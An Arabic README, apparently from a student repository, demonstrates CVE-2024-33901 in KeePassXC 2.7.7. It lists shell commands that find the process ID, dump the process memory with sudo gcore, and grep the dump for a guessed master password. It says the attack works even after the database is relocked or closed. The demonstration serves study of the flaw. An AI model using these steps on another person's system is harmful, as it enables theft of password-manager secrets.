
برنامج قصير يوضح الثغرة CVE-2024-33901 في KeePassXC الإصدار 2.7.7
برنامج قصير يوضح الثغرة CVE-2024-33901 في KeePassXC الإصدار 2.7.7
قد يحتاج تقرير الفصل إلى ربط الكود المصدري، ولهذا السبب أنشأت هذا المستودع
يمكن تحقيق ذلك عن طريق الحصول على PID، والذي يمكن فعله بهذا الأمر:
ps aux | grep keepassxc
ثم تشغيل هذا الأمر: sudo gcore -o keepassxc_dump PID_HERE
على سبيل المثال، إذا كان PID الذي حصلت عليه هو 1234، فسيكون الأمر:
sudo gcore -o keepassxc_dump 1234
3. أخيرًا، يمكنك تشغيل هذا الأمر: cat keepassxc_dump.PID_HERE | strings | grep "password guess here"
لذا إذا كان PID هو 1234، سيكون الأمر:
cat keepassxc_dump.1234 | strings | grep "password guess here"
بمجرد إنشاء ملف تفريغ الذاكرة، يمكن تنفيذ الهجوم حتى إذا تم قفل قاعدة البيانات مرة أخرى أو إذا تم إغلاق KeePassXC.
يقوم كود بايثون المقدم بتنفيذ كل هذه الخطوات، ويحاول تخمينات متعددة لكلمات المرور بناءً على الملفات النصية المقدمة.